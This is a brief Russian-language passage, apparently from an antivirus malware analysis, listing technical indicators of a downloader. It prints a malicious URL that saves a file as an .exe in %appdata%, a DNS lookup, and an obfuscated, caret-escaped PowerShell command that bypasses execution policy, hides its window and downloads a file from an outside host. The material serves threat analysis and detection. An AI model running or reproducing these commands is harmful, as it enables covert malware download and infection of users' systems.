Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWER^SH^e^l^L^.^eXE -e^xE^CuTiONp^OLi^C^Y B^Y^PAs^s -nOp^RoFIlE -wiNdowStyle^ hIDd^En^ (^nEW^-OBjEct ^s^yS^tEM^.^NET.Web^Client).do^Wnl^o^a^dFi^lE(^'http://www.zoerp...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "poWER^SH^e^l^L^.^eXE -e^xE^CuTiONp^OLi^C^Y B^Y^PAs^s -nOp^RoFIlE -wiNdowStyle^ hIDd^En^ (^nEW^-OBjEct ^s^yS^tEM^.^NET.Web^Client).do^Wnl^o^a^dFi^lE(^'http://www.zoerp...' (со скрытым окном)